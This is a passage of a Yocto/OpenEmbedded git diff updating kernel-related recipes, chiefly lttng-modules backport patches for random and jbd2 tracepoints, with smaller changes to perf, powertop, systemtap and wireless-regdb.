+Signed-off-by: He Zhe <zhe.he@windriver.com>
+Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
+Change-Id: I0b7eb8aa78b5bd2039e20ae3e1da4c5eb9018789
+---
+ probes/Kbuild | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/probes/Kbuild b/probes/Kbuild
+index 58da82b8..87f2d681 100644
+--- a/probes/Kbuild
++++ b/probes/Kbuild
+@@ -217,7 +217,10 @@ endif
+
+ # Introduced in v3.6, remove in v5.18
+ obj-$(CONFIG_LTTNG) += $(shell \
+- if [ \( ! \( $(VERSION) -ge 6 -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -ge 18 \) \) \) \
++ if [ \( ! \( $(VERSION) -ge 6 \
++ -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -ge 18 \) \
++ -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -eq 15 -a $(SUBLEVEL) -ge 44 \) \
++ -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -eq 10 -a $(SUBLEVEL) -ge 119\) \) \) \
+ -a \
+ $(VERSION) -ge 4 \
+ -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -ge 6 \) \
+--
+2.35.1
+
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0019-fix-random-tracepoints-removed-in-stable-kernels.patch b/meta/recipes-kernel/lttng/lttng-modules/0019-fix-random-tracepoints-removed-in-stable-kernels.patch
new file mode 100644
index 0000000000..73ba4d06bc
--- /dev/null
+++ b/meta/recipes-kernel/lttng/lttng-modules/0019-fix-random-tracepoints-removed-in-stable-kernels.patch
@@ -0,0 +1,51 @@
+From 2c98e0cd03eba0aa935796bc7413c51b5e4b055c Mon Sep 17 00:00:00 2001
+From: Michael Jeanson <mjeanson@efficios.com>
+Date: Tue, 31 May 2022 15:24:48 -0400
+Subject: [PATCH 19/19] fix: 'random' tracepoints removed in stable kernels
+
+The upstream commit 14c174633f349cb41ea90c2c0aaddac157012f74 removing
+the 'random' tracepoints is being backported to multiple stable kernel
+branches, I don't see how that qualifies as a fix but here we are.
+
+Use the presence of 'include/trace/events/random.h' in the kernel source
+tree instead of the rather tortuous version check to determine if we
+need to build 'lttng-probe-random.ko'.
+
+Upstream-Status: Backport [ed1149ef88fb62c365ac66cf62c58ac6abd8d7e8]
+Change-Id: I8f5f2f4c9e09c61127c49c7949b22dd3fab0460d
+Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
+Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
+---
+ probes/Kbuild | 16 ++++------------
+ 1 file changed, 4 insertions(+), 12 deletions(-)
+
+diff --git a/probes/Kbuild b/probes/Kbuild
+index 87f2d681..f09d6b65 100644
+--- a/probes/Kbuild
++++ b/probes/Kbuild
+@@ -216,18 +216,10 @@ ifneq ($(CONFIG_FRAME_WARN),0)
+ endif
+
+ # Introduced in v3.6, remove in v5.18
+-obj-$(CONFIG_LTTNG) += $(shell \
+- if [ \( ! \( $(VERSION) -ge 6 \
+- -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -ge 18 \) \
+- -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -eq 15 -a $(SUBLEVEL) -ge 44 \) \
+- -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -eq 10 -a $(SUBLEVEL) -ge 119\) \) \) \
+- -a \
+- $(VERSION) -ge 4 \
+- -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -ge 6 \) \
+- -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -eq 5 -a $(SUBLEVEL) -ge 2 \) \
+- -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -eq 4 -a $(SUBLEVEL) -ge 9 \) \
+- -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -eq 0 -a $(SUBLEVEL) -ge 41 \) ] ; then \
+- echo "lttng-probe-random.o" ; fi;)
++random_dep = $(srctree)/include/trace/events/random.h
++ifneq ($(wildcard $(random_dep)),)
++ obj-$(CONFIG_LTTNG) += lttng-probe-random.o
++endif
+
+ obj-$(CONFIG_LTTNG) += $(shell \
+ if [ $(VERSION) -ge 4 \
+--
+2.35.1
+
diff --git a/meta/recipes-kernel/lttng/lttng-modules/fix-jbd2-use-the-correct-print-format.patch b/meta/recipes-kernel/lttng/lttng-modules/fix-jbd2-use-the-correct-print-format.patch
new file mode 100644
index 0000000000..b4939188cc
--- /dev/null
+++ b/meta/recipes-kernel/lttng/lttng-modules/fix-jbd2-use-the-correct-print-format.patch
@@ -0,0 +1,147 @@
+fix: jbd2: use the correct print format
+See upstream commit :
+
+ commit d87a7b4c77a997d5388566dd511ca8e6b8e8a0a8
+ Author: Bixuan Cui <cuibixuan@linux.alibaba.com>
+ Date: Tue Oct 11 19:33:44 2022 +0800
+
+ jbd2: use the correct print format
+
+ The print format error was found when using ftrace event:
+ <...>-1406 [000] .... 23599442.895823: jbd2_end_commit: dev 252,8 transaction -1866216965 sync 0 head -1866217368
+ <...>-1406 [000] .... 23599442.896299: jbd2_start_commit: dev 252,8 transaction -1866216964 sync 0
+
+ Use the correct print format for transaction, head and tid.
+
+Change-Id: Ic053f0e0c1e24ebc75bae51d07696aaa5e1c0094
+Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
+Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
+
+Upstream-status: Backport
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+Note: combines three upstream commits:
+https://github.com/lttng/lttng-modules/commit/b28830a0dcdf95ec3e6b390b4d032667deaad0c0
+https://github.com/lttng/lttng-modules/commit/4fd2615b87b3cac0fd5bdc5fc82db05f6fcfdecf
+https://github.com/lttng/lttng-modules/commit/612c99eb24bf72f4d47d02025e92de8c35ece14e
+
+diff --git a/instrumentation/events/lttng-module/jbd2.h b/instrumentation/events/lttng-module/jbd2.h
+--- a/instrumentation/events/lttng-module/jbd2.h
++++ b/instrumentation/events/lttng-module/jbd2.h
+@@ -29,6 +29,25 @@ LTTNG_TRACEPOINT_EVENT(jbd2_checkpoint,
+ )
+ )
+
++#if (LTTNG_LINUX_VERSION_CODE >= LTTNG_KERNEL_VERSION(6,2,0) \
++ || LTTNG_KERNEL_RANGE(5,4,229, 5,5,0) \
++ || LTTNG_KERNEL_RANGE(5,10,163, 5,11,0) \
++ || LTTNG_KERNEL_RANGE(5,15,87, 5,16,0) \
++ || LTTNG_KERNEL_RANGE(6,0,18, 6,1,0) \
++ || LTTNG_KERNEL_RANGE(6,1,4, 6,2,0))
++LTTNG_TRACEPOINT_EVENT_CLASS(jbd2_commit,
++
++ TP_PROTO(journal_t *journal, transaction_t *commit_transaction),
++
++ TP_ARGS(journal, commit_transaction),
++
++ TP_FIELDS(
++ ctf_integer(dev_t, dev, journal->j_fs_dev->bd_dev)
++ ctf_integer(char, sync_commit, commit_transaction->t_synchronous_commit)
++ ctf_integer(tid_t, transaction, commit_transaction->t_tid)
++ )
++)
++#else
+ LTTNG_TRACEPOINT_EVENT_CLASS(jbd2_commit,
+
+ TP_PROTO(journal_t *journal, transaction_t *commit_transaction),
+@@ -41,6 +60,7 @@ LTTNG_TRACEPOINT_EVENT_CLASS(jbd2_commit
+ ctf_integer(int, transaction, commit_transaction->t_tid)
+ )
+ )
++#endif
+
+ LTTNG_TRACEPOINT_EVENT_INSTANCE(jbd2_commit, jbd2_start_commit,
+
+@@ -79,6 +99,25 @@ LTTNG_TRACEPOINT_EVENT_INSTANCE(jbd2_com
+ )
+ #endif
+
++#if (LTTNG_LINUX_VERSION_CODE >= LTTNG_KERNEL_VERSION(6,2,0) \
++ || LTTNG_KERNEL_RANGE(5,4,229, 5,5,0) \
++ || LTTNG_KERNEL_RANGE(5,10,163, 5,11,0) \
++ || LTTNG_KERNEL_RANGE(5,15,87, 5,16,0) \
++ || LTTNG_KERNEL_RANGE(6,0,18, 6,1,0) \
++ || LTTNG_KERNEL_RANGE(6,1,4, 6,2,0))
++LTTNG_TRACEPOINT_EVENT(jbd2_end_commit,
++ TP_PROTO(journal_t *journal, transaction_t *commit_transaction),
++
++ TP_ARGS(journal, commit_transaction),
++
++ TP_FIELDS(
++ ctf_integer(dev_t, dev, journal->j_fs_dev->bd_dev)
++ ctf_integer(char, sync_commit, commit_transaction->t_synchronous_commit)
++ ctf_integer(tid_t, transaction, commit_transaction->t_tid)
++ ctf_integer(tid_t, head, journal->j_tail_sequence)
++ )
++)
++#else
+ LTTNG_TRACEPOINT_EVENT(jbd2_end_commit,
+ TP_PROTO(journal_t *journal, transaction_t *commit_transaction),
+
+@@ -91,6 +130,7 @@ LTTNG_TRACEPOINT_EVENT(jbd2_end_commit,
+ ctf_integer(int, head, journal->j_tail_sequence)
+ )
+ )
++#endif
+
+ LTTNG_TRACEPOINT_EVENT(jbd2_submit_inode_data,
+ TP_PROTO(struct inode *inode),
+@@ -103,7 +143,48 @@ LTTNG_TRACEPOINT_EVENT(jbd2_submit_inode
+ )
+ )
+
+-#if (LTTNG_LINUX_VERSION_CODE >= LTTNG_KERNEL_VERSION(2,6,32))
++#if (LTTNG_LINUX_VERSION_CODE >= LTTNG_KERNEL_VERSION(6,2,0) \
++ || LTTNG_KERNEL_RANGE(5,4,229, 5,5,0) \
++ || LTTNG_KERNEL_RANGE(5,10,163, 5,11,0) \
++ || LTTNG_KERNEL_RANGE(5,15,87, 5,16,0) \
++ || LTTNG_KERNEL_RANGE(6,0,18, 6,1,0) \
++ || LTTNG_KERNEL_RANGE(6,1,4, 6,2,0))
++LTTNG_TRACEPOINT_EVENT(jbd2_run_stats,
++ TP_PROTO(dev_t dev, tid_t tid,
++ struct transaction_run_stats_s *stats),
++
++ TP_ARGS(dev, tid, stats),
++
++ TP_FIELDS(
++ ctf_integer(dev_t, dev, dev)
++ ctf_integer(tid_t, tid, tid)
++ ctf_integer(unsigned long, wait, stats->rs_wait)
++ ctf_integer(unsigned long, running, stats->rs_running)
++ ctf_integer(unsigned long, locked, stats->rs_locked)
++ ctf_integer(unsigned long, flushing, stats->rs_flushing)
++ ctf_integer(unsigned long, logging, stats->rs_logging)
++ ctf_integer(__u32, handle_count, stats->rs_handle_count)
++ ctf_integer(__u32, blocks, stats->rs_blocks)
++ ctf_integer(__u32, blocks_logged, stats->rs_blocks_logged)
++ )
++)
++
++LTTNG_TRACEPOINT_EVENT(jbd2_checkpoint_stats,
++ TP_PROTO(dev_t dev, tid_t tid,
++ struct transaction_chp_stats_s *stats),
++
++ TP_ARGS(dev, tid, stats),
++
++ TP_FIELDS(
++ ctf_integer(dev_t, dev, dev)
++ ctf_integer(tid_t, tid, tid)
++ ctf_integer(unsigned long, chp_time, stats->cs_chp_time)
++ ctf_integer(__u32, forced_to_close, stats->cs_forced_to_close)
++ ctf_integer(__u32, written, stats->cs_written)
++ ctf_integer(__u32, dropped, stats->cs_dropped)
++ )
++)
++#else
+ LTTNG_TRACEPOINT_EVENT(jbd2_run_stats,
+ TP_PROTO(dev_t dev, unsigned long tid,
+ struct transaction_run_stats_s *stats),
diff --git a/meta/recipes-kernel/lttng/lttng-modules_2.11.6.bb b/meta/recipes-kernel/lttng/lttng-modules_2.11.9.bb
index a38d8afb7a..8e9c44241b 100644
--- a/meta/recipes-kernel/lttng/lttng-modules_2.11.6.bb
+++ b/meta/recipes-kernel/lttng/lttng-modules_2.11.9.bb
@@ -1,6 +1,7 @@
SECTION = "devel"
SUMMARY = "Linux Trace Toolkit KERNEL MODULE"
DESCRIPTION = "The lttng-modules 2.0 package contains the kernel tracer modules"
+HOMEPAGE = "https://lttng.org/"
LICENSE = "LGPLv2.1 & GPLv2 & MIT"
LIC_FILES_CHKSUM = "file://LICENSE;md5=3f882d431dc0f32f1f44c0707aa41128"
@@ -11,10 +12,14 @@ COMPATIBLE_HOST = '(x86_64|i.86|powerpc|aarch64|mips|nios2|arm|riscv).*-linux'
SRC_URI = "https://lttng.org/files/${BPN}/${BPN}-${PV}.tar.bz2 \
file://Makefile-Do-not-fail-if-CONFIG_TRACEPOINTS-is-not-en.patch \
file://BUILD_RUNTIME_BUG_ON-vs-gcc7.patch \
+ file://0017-fix-random-remove-unused-tracepoints-v5.18.patch \
+ file://0018-fix-random-remove-unused-tracepoints-v5.10-v5.15.patch \
+ file://0019-fix-random-tracepoints-removed-in-stable-kernels.patch \
+ file://fix-jbd2-use-the-correct-print-format.patch \
"
-SRC_URI[md5sum] = "8ef09fdfcdec669d33f7fc1c1c80f2c4"
-SRC_URI[sha256sum] = "23372811cdcd2ac28ba8c9d09484ed5f9238cfbd0043f8c663ff3875ba9c8566"
+SRC_URI[md5sum] = "cfb23ea6bdaf1ad40c7f9ac098b4016d"
+SRC_URI[sha256sum] = "0c5fe9f8d8dbd1411a3c1c643dcbd0a55577bd15845758b73948e00bc7c387a6"
export INSTALL_MOD_DIR="kernel/lttng-modules"
@@ -22,7 +27,9 @@ EXTRA_OEMAKE += "KERNELDIR='${STAGING_KERNEL_DIR}'"
do_install_append() {
# Delete empty directories to avoid QA failures if no modules were built
- find ${D}/${nonarch_base_libdir} -depth -type d -empty -exec rmdir {} \;
+ if [ -d ${D}/${nonarch_base_libdir} ]; then
+ find ${D}/${nonarch_base_libdir} -depth -type d -empty -exec rmdir {} \;
+ fi
}
python do_package_prepend() {
diff --git a/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb b/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb
index a969fffd62..6306193809 100644
--- a/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb
+++ b/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb
@@ -3,13 +3,14 @@ SUMMARY = "Linux Trace Toolkit Control"
DESCRIPTION = "The Linux trace toolkit is a suite of tools designed \
to extract program execution details from the Linux operating system \
and interpret them."
+HOMEPAGE = "https://github.com/lttng/lttng-tools"
LICENSE = "GPLv2 & LGPLv2.1"
LIC_FILES_CHKSUM = "file://LICENSE;md5=01d7fc4496aacf37d90df90b90b0cac1 \
file://gpl-2.0.txt;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
file://lgpl-2.1.txt;md5=0f0d71500e6a57fd24d825f33242b9ca"
-DEPENDS = "liburcu popt libxml2 util-linux"
+DEPENDS = "liburcu popt libxml2 util-linux bison-native"
RDEPENDS_${PN} = "libgcc"
RDEPENDS_${PN}-ptest += "make perl bash gawk babeltrace procps perl-module-overloading coreutils util-linux kmod lttng-modules sed python3-core"
RDEPENDS_${PN}-ptest_append_libc-glibc = " glibc-utils"
diff --git a/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb b/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb
index c7edb20ee4..32b89bb5ea 100644
--- a/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb
+++ b/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb
@@ -1,8 +1,9 @@
SUMMARY = "Build tools needed by external modules"
+HOMEPAGE = "https://www.yoctoproject.org/"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://${COREBASE}/meta/files/common-licenses/GPL-2.0;md5=801f80980d171dd6425610833a22dbe6"
-inherit kernel-arch
+inherit kernel-arch linux-kernel-base
inherit pkgconfig
PACKAGE_ARCH = "${MACHINE_ARCH}"
@@ -15,8 +16,10 @@ do_compile[depends] += "virtual/kernel:do_compile_kernelmodules"
RDEPENDS_${PN}-dev = ""
DEPENDS += "bc-native bison-native"
+DEPENDS += "gmp-native"
EXTRA_OEMAKE = " HOSTCC="${BUILD_CC} ${BUILD_CFLAGS} ${BUILD_LDFLAGS}" HOSTCPP="${BUILD_CPP}""
+EXTRA_OEMAKE += " HOSTCXX="${BUILD_CXX} ${BUILD_CXXFLAGS} ${BUILD_LDFLAGS}" CROSS_COMPILE=${TARGET_PREFIX}"
# Build some host tools under work-shared. CC, LD, and AR are probably
# not used, but this is the historical way of invoking "make scripts".
diff --git a/meta/recipes-kernel/modutils-initscripts/files/modutils.sh b/meta/recipes-kernel/modutils-initscripts/files/modutils.sh
index a78adf5729..df37bfe7a1 100755
--- a/meta/recipes-kernel/modutils-initscripts/files/modutils.sh
+++ b/meta/recipes-kernel/modutils-initscripts/files/modutils.sh
@@ -18,7 +18,7 @@ LOAD_MODULE=modprobe
if [ ! -f /lib/modules/`uname -r`/modules.dep ]; then
[ "$VERBOSE" != no ] && echo "Calculating module dependencies ..."
- depmod -Ae
+ depmod -a
fi
loaded_modules=" "
diff --git a/meta/recipes-kernel/perf/perf.bb b/meta/recipes-kernel/perf/perf.bb
index 578b871e9e..42621e47d3 100644
--- a/meta/recipes-kernel/perf/perf.bb
+++ b/meta/recipes-kernel/perf/perf.bb
@@ -9,11 +9,11 @@ HOMEPAGE = "https://perf.wiki.kernel.org/index.php/Main_Page"
LICENSE = "GPLv2"
-PR = "r9"
+PR = "r10"
PACKAGECONFIG ??= "scripting tui libunwind"
PACKAGECONFIG[dwarf] = ",NO_DWARF=1"
-PACKAGECONFIG[scripting] = ",NO_LIBPERL=1 NO_LIBPYTHON=1,perl python3"
+PACKAGECONFIG[scripting] = ",NO_LIBPERL=1 NO_LIBPYTHON=1,perl python3 python3-setuptools-native"
# gui support was added with kernel 3.6.35
# since 3.10 libnewt was replaced by slang
# to cover a wide range of kernel we add both dependencies
@@ -45,7 +45,7 @@ PROVIDES = "virtual/perf"
inherit linux-kernel-base kernel-arch manpages
# needed for building the tools/perf Python bindings
-inherit ${@bb.utils.contains('PACKAGECONFIG', 'scripting', 'python3native', '', d)}
+inherit ${@bb.utils.contains('PACKAGECONFIG', 'scripting', 'python3targetconfig', '', d)}
inherit python3-dir
export PYTHON_SITEPACKAGES_DIR
@@ -265,9 +265,9 @@ PACKAGES =+ "${PN}-archive ${PN}-tests ${PN}-perl ${PN}-python"
RDEPENDS_${PN} += "elfutils bash"
RDEPENDS_${PN}-archive =+ "bash"
-RDEPENDS_${PN}-python =+ "bash python3 python3-modules ${@bb.utils.contains('PACKAGECONFIG', 'audit', 'audit-python3', '', d)}"
+RDEPENDS_${PN}-python =+ "bash python3 python3-modules ${@bb.utils.contains('PACKAGECONFIG', 'audit', 'audit-python', '', d)}"
RDEPENDS_${PN}-perl =+ "bash perl perl-modules"
-RDEPENDS_${PN}-tests =+ "python3"
+RDEPENDS_${PN}-tests =+ "python3 bash"
RSUGGESTS_SCRIPTING = "${@bb.utils.contains('PACKAGECONFIG', 'scripting', '${PN}-perl ${PN}-python', '',d)}"
RSUGGESTS_${PN} += "${PN}-archive ${PN}-tests ${RSUGGESTS_SCRIPTING}"
diff --git a/meta/recipes-kernel/powertop/powertop/0002-configure.ac-ax_add_fortify_source.patch b/meta/recipes-kernel/powertop/powertop/0002-configure.ac-ax_add_fortify_source.patch
new file mode 100644
index 0000000000..4ccbdbfcd1
--- /dev/null
+++ b/meta/recipes-kernel/powertop/powertop/0002-configure.ac-ax_add_fortify_source.patch
@@ -0,0 +1,70 @@
+From 0d833743954ac1c58773cbf7a78fe0dc8105ae4a Mon Sep 17 00:00:00 2001
+From: Joe Konno <joe.konno@linux.intel.com>
+Date: Tue, 11 Feb 2020 14:15:42 -0800
+Subject: [PATCH] configure.ac: ax_add_fortify_source
+
+Use a maintained autoconf-archive macro to determine whether we need to
+add -D_FORTIFY_SOURCE=3D2, or if the underlying OS (or toolchain) has it
+baked in.
+
+Signed-off-by: Joe Konno <joe.konno@intel.com>
+
+Fixes:
+ aclocal: error: too many loops
+
+Upstream-Status: Backport from 2.12
+Signed-off-by: Tim Orling <timothy.t.orling@intel.com>
+---
+ configure.ac | 2 +-
+ m4/gcc_fortify_source_cc.m4 | 29 -----------------------------
+ 2 files changed, 1 insertion(+), 30 deletions(-)
+ delete mode 100644 m4/gcc_fortify_source_cc.m4
+
+diff --git a/configure.ac b/configure.ac
+index d6a15e1..d68369c 100644
+--- a/configure.ac
++++ b/configure.ac
+@@ -36,7 +36,7 @@ AC_PROG_LIBTOOL
+ AC_PROG_CC
+ AC_PROG_INSTALL
+ AM_PROG_CC_C_O
+-GCC_FORTIFY_SOURCE_CC
++AX_ADD_FORTIFY_SOURCE
+ AX_CXX_COMPILE_STDCXX_11([noext], [mandatory])
+
+ # Checks for libraries.
+diff --git a/m4/gcc_fortify_source_cc.m4 b/m4/gcc_fortify_source_cc.m4
+deleted file mode 100644
+index 1206672..0000000
+--- a/m4/gcc_fortify_source_cc.m4
++++ /dev/null
+@@ -1,29 +0,0 @@
+-dnl GCC_FORTIFY_SOURCE_CC
+-dnl checks -D_FORTIFY_SOURCE with the C++ compiler, if it exists then
+-dnl updates CXXCPP
+-AC_DEFUN([GCC_FORTIFY_SOURCE_CC],[
+- AC_LANG_ASSERT([C++])
+- AS_IF([test "X$CXX" != "X"], [
+- AC_MSG_CHECKING([for FORTIFY_SOURCE support])
+- fs_old_cxxcpp="$CXXCPP"
+- fs_old_cxxflags="$CXXFLAGS"
+- CXXCPP="$CXXCPP -D_FORTIFY_SOURCE=2"
+- CXXFLAGS="$CXXFLAGS -Werror"
+- AC_COMPILE_IFELSE([
+- AC_LANG_PROGRAM([[]], [[
+- int main(void) {
+- #if !(__GNUC_PREREQ (4, 1) )
+- #error No FORTIFY_SOURCE support
+- #endif
+- return 0;
+- }
+- ]], [
+- AC_MSG_RESULT([yes])
+- ], [
+- AC_MSG_RESULT([no])
+- CXXCPP="$fs_old_cxxcpp"
+- ])
+- ])
+- CXXFLAGS="$fs_old_cxxflags"
+- ])
+-])
diff --git a/meta/recipes-kernel/powertop/powertop/0003-configure-Use-AX_REQUIRE_DEFINED.patch b/meta/recipes-kernel/powertop/powertop/0003-configure-Use-AX_REQUIRE_DEFINED.patch
new file mode 100644
index 0000000000..ac728f4a39
--- /dev/null
+++ b/meta/recipes-kernel/powertop/powertop/0003-configure-Use-AX_REQUIRE_DEFINED.patch
@@ -0,0 +1,29 @@
+From fbf74492236676e844b021b0dbb45b1ca43a0410 Mon Sep 17 00:00:00 2001
+From: David King <amigadave@amigadave.com>
+Date: Thu, 15 Apr 2021 11:45:13 +0100
+Subject: [PATCH] configure: Use AX_REQUIRE_DEFINED
+
+Require additional macros to be defined early, to avoid an aclocal
+"too many loops" error when copying macros.
+
+Upstream-Status: Backport from tip
+
+Signed-off-by: Tim Orling <ticotimo@gmail.com>
+---
+ configure.ac | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/configure.ac b/configure.ac
+index d68369c..b90831b 100644
+--- a/configure.ac
++++ b/configure.ac
+@@ -29,6 +29,9 @@ AM_GNU_GETTEXT([external])
+ AM_GNU_GETTEXT_VERSION([0.18.2])
+
+ m4_ifdef([AM_PROG_AR], [AM_PROG_AR])
++AX_REQUIRE_DEFINED([AX_ADD_FORTIFY_SOURCE])
++AX_REQUIRE_DEFINED([AX_CXX_COMPILE_STDCXX])
++AX_REQUIRE_DEFINED([AX_PTHREAD])
+ # Checks for programs.
+ AC_PROG_CPP
+ AC_PROG_CXX
diff --git a/meta/recipes-kernel/powertop/powertop_2.10.bb b/meta/recipes-kernel/powertop/powertop_2.10.bb
index f1b0e92b2b..dcbba2fd5c 100644
--- a/meta/recipes-kernel/powertop/powertop_2.10.bb
+++ b/meta/recipes-kernel/powertop/powertop_2.10.bb
@@ -2,13 +2,15 @@ SUMMARY = "Power usage tool"
DESCRIPTION = "Linux tool to diagnose issues with power consumption and power management."
HOMEPAGE = "https://01.org/powertop/"
BUGTRACKER = "https://app.devzing.com/powertopbugs/bugzilla"
-DEPENDS = "ncurses libnl pciutils"
+DEPENDS = "ncurses libnl pciutils autoconf-archive"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e"
-SRC_URI = "git://github.com/fenrus75/powertop;protocol=https \
- file://0001-wakeup_xxx.h-include-limits.h.patch \
-"
+SRC_URI = "git://github.com/fenrus75/powertop;protocol=https;branch=master \
+ file://0001-wakeup_xxx.h-include-limits.h.patch \
+ file://0002-configure.ac-ax_add_fortify_source.patch \
+ file://0003-configure-Use-AX_REQUIRE_DEFINED.patch \
+ "
SRCREV = "e8765b5475b22b7a2b6e9e8a031c68a268a0b0b3"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-kernel/systemtap/systemtap-uprobes_git.bb b/meta/recipes-kernel/systemtap/systemtap-uprobes_git.bb
index 46820ef489..6ee0be5e3e 100644
--- a/meta/recipes-kernel/systemtap/systemtap-uprobes_git.bb
+++ b/meta/recipes-kernel/systemtap/systemtap-uprobes_git.bb
@@ -1,5 +1,5 @@
SUMMARY = "UProbes kernel module for SystemTap"
-
+HOMEPAGE = "https://sourceware.org/systemtap/"
require systemtap_git.inc
DEPENDS = "systemtap virtual/kernel"
diff --git a/meta/recipes-kernel/systemtap/systemtap/0001-gcc12-c-compatibility-re-tweak-for-rhel6-use-functio.patch b/meta/recipes-kernel/systemtap/systemtap/0001-gcc12-c-compatibility-re-tweak-for-rhel6-use-functio.patch
new file mode 100644
index 0000000000..f885c44460
--- /dev/null
+++ b/meta/recipes-kernel/systemtap/systemtap/0001-gcc12-c-compatibility-re-tweak-for-rhel6-use-functio.patch
@@ -0,0 +1,49 @@
+From f199d1982ef8a6c6d5c06c082d057b8793bcc6aa Mon Sep 17 00:00:00 2001
+From: Serhei Makarov <serhei@serhei.io>
+Date: Fri, 21 Jan 2022 18:21:46 -0500
+Subject: [PATCH] gcc12 c++ compatibility re-tweak for rhel6: use function
+ pointer instead of lambdas instead of ptr_fun<>
+
+Saving 2 lines in ltrim/rtrim is probably not a good reason to drop
+compatibility with the RHEL6 system compiler. Actually declaring a
+named function and passing the function pointer is compatible with
+everything.
+
+Upstream-Status: Backport [https://sourceware.org/git/?p=systemtap.git;a=commit;h=f199d1982ef8a6c6d5c06c082d057b8793bcc6aa]
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ util.cxx | 13 ++++++++-----
+ 1 file changed, 8 insertions(+), 5 deletions(-)
+
+--- a/util.cxx
++++ b/util.cxx
+@@ -1757,21 +1757,24 @@ flush_to_stream (const string &fname, os
+ return 1; // Failure
+ }
+
++int
++not_isspace(unsigned char c)
++{
++ return !std::isspace(c);
++}
++
+ // trim from start (in place)
+ void
+ ltrim(std::string &s)
+ {
+- s.erase(s.begin(),
+- std::find_if(s.begin(), s.end(),
+- std::not1(std::ptr_fun<int, int>(std::isspace))));
++ s.erase(s.begin(), std::find_if(s.begin(), s.end(), not_isspace));
+ }
+
+ // trim from end (in place)
+ void
+ rtrim(std::string &s)
+ {
+- s.erase(std::find_if(s.rbegin(), s.rend(),
+- std::not1(std::ptr_fun<int, int>(std::isspace))).base(), s.end());
++ s.erase(std::find_if(s.rbegin(), s.rend(), not_isspace).base(), s.end());
+ }
+
+ // trim from both ends (in place)
diff --git a/meta/recipes-kernel/systemtap/systemtap_git.bb b/meta/recipes-kernel/systemtap/systemtap_git.bb
index 1c9f2aed16..a8b2cf1eac 100644
--- a/meta/recipes-kernel/systemtap/systemtap_git.bb
+++ b/meta/recipes-kernel/systemtap/systemtap_git.bb
@@ -1,9 +1,14 @@
SUMMARY = "Script-directed dynamic tracing and performance analysis tool for Linux"
+DESCRIPTION = "It provides free software infrastructure to simplify the \
+gathering of information about the running Linux system. This assists \
+diagnosis of a performance or functional problem."
HOMEPAGE = "https://sourceware.org/systemtap/"
require systemtap_git.inc
-SRC_URI += "file://0001-improve-reproducibility-for-c-compiling.patch"
+SRC_URI += "file://0001-improve-reproducibility-for-c-compiling.patch \
+ file://0001-gcc12-c-compatibility-re-tweak-for-rhel6-use-functio.patch \
+ "
DEPENDS = "elfutils"
diff --git a/meta/recipes-kernel/systemtap/systemtap_git.inc b/meta/recipes-kernel/systemtap/systemtap_git.inc
index 116e83fe0f..af55f15fd4 100644
--- a/meta/recipes-kernel/systemtap/systemtap_git.inc
+++ b/meta/recipes-kernel/systemtap/systemtap_git.inc
@@ -3,7 +3,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
SRCREV = "044a0640985ef007c0b2fb6eaf660d9d51800cda"
PV = "4.2"
-SRC_URI = "git://sourceware.org/git/systemtap.git \
+SRC_URI = "git://sourceware.org/git/systemtap.git;branch=master \
file://0001-Do-not-let-configure-write-a-python-location-into-th.patch \
file://0001-Install-python-modules-to-correct-library-dir.patch \
file://0001-staprun-stapbpf-don-t-support-installing-a-non-root.patch \
diff --git a/meta/recipes-kernel/wireless-regdb/wireless-regdb_2020.04.29.bb b/meta/recipes-kernel/wireless-regdb/wireless-regdb_2024.01.23.bb
index 30d4cb523f..6489bc90d9 100644
--- a/meta/recipes-kernel/wireless-regdb/wireless-regdb_2020.04.29.bb
+++ b/meta/recipes-kernel/wireless-regdb/wireless-regdb_2024.01.23.bb
@@ -5,7 +5,7 @@ LICENSE = "ISC"
LIC_FILES_CHKSUM = "file://LICENSE;md5=07c4f6dea3845b02a18dc00c8c87699c"
SRC_URI = "https://www.kernel.org/pub/software/network/${BPN}/${BP}.tar.xz"
-SRC_URI[sha256sum] = "89fd031aed5977c219a71501e144375a10e7c90d1005d5d086ea7972886a2c7a"
+SRC_URI[sha256sum] = "c8a61c9acf76fa7eb4239e89f640dee3e87098d9f69b4d3518c9c60fc6d20c55"
inherit bin_package allarch
@@ -13,7 +13,7 @@ do_install() {
install -d -m0755 ${D}${nonarch_libdir}/crda
install -d -m0755 ${D}${sysconfdir}/wireless-regdb/pubkeys
install -m 0644 regulatory.bin ${D}${nonarch_libdir}/crda/regulatory.bin
- install -m 0644 sforshee.key.pub.pem ${D}${sysconfdir}/wireless-regdb/pubkeys/sforshee.key.pub.pem
